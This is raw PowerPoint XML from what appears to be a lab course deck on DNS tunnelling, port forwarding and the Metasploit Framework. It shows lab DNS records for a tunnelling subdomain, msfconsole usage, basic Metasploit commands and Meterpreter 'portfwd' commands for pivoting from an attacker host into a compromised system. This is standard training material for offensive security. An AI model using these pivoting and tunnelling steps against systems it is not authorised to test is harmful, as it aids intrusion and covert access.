                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ~/Downloads/02082022.pem ubuntu@172.16.16.1 -v</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4746457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CE1DE-E9DC-4514-B135-07BFB3AFF59A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS Tunnelling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21F28D0B-E5AD-4E03-A09C-A1E47B34D9C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="2273968"/>
            <a:ext cx="10469896" cy="2179443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># Configure domain </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>New subdomain: proxy.bisplabdomain.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>New DNS Records:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	Proxy.bisplabdomain.com	NS	dns.bisplabdomain.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	Dns.bisplabdomain.com	A	34.x.x.x</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13518131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DD419-462B-4B93-A50E-C8DDF31C45BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Port Forwarding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2FB84CC-769A-49A5-84D1-6B173BB72878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523382" y="3732795"/>
            <a:ext cx="11145235" cy="1067806"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4368B55-1DF6-4C62-B983-14951DA60BCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="2225843"/>
            <a:ext cx="3932237" cy="3811588"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“…redirects a communication request from one address and port number combination to another while the packets are traversing a network gateway, such as a router or firewall.”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2321EA9E-18BA-4859-8E4D-571EB8C9C871}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5961657" y="1924876"/>
            <a:ext cx="6118050" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># -p show the PID and program name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># -l  show listening sockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># -a show all sockets, listening and connected (redundant)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># -n show numerical addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88979127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2C215-E7EA-4008-A355-6D1EBEC8DDF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit Framework</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1397AD49-24C8-4DD0-ABA0-9FEFFCE9D311}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6011954" y="826532"/>
            <a:ext cx="5714826" cy="5693758"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{425C77FF-E342-47D8-AC44-834C1B35CD99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="2138640"/>
            <a:ext cx="3932237" cy="3811588"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Created by H. D. Moore in 2003</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Current version written in ruby</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Community and Commercial versions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>“Tool for developing and executing exploit code against a remote machine”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>includes anti-forensic and evasion tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>pre-installed in the Kali Linux operating system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9448DEF8-53D0-4B9B-A55B-5CB00F0D01A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="344071" y="6031468"/>
            <a:ext cx="4776537" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Metasploit_Project</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E03D331C-4C67-4F1F-B71D-20D5E394711D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593306" y="457200"/>
            <a:ext cx="4944979" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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71694577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6B1CA-052C-480D-81EB-87C23A597C69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="457200"/>
            <a:ext cx="5561012" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Helpful Metasploit Commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{536D047C-01A1-488B-92D0-5426E7E99B78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="2177716"/>
            <a:ext cx="3932237" cy="3811588"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(tab auto-complete)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>help</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>info </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>options|payloads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>run</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279434879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C300B8-1F36-4022-B7B2-9723CEC073B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="457200"/>
            <a:ext cx="5825707" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Port Forwarding w/Meterpreter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96F5BB60-E5E0-4FDE-A8B2-68DC2BEE3011}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="2057400"/>
            <a:ext cx="10710528" cy="3681663"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>portfwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> help</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>portfwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># add port forwarding rule, listen on attacker’s local 8080, forward to localhost port 80 on remote system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>portfwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> add –l 8080 –r 127.0.0.1 –p 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># list forwarded ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>portfwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># delete port forwarding rule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>portfwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> delete</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137189732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3550B9-C61C-459A-834A-0A5B29A360B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="457200"/>
            <a:ext cx="4758579" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tunnelling w/Meterpreter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
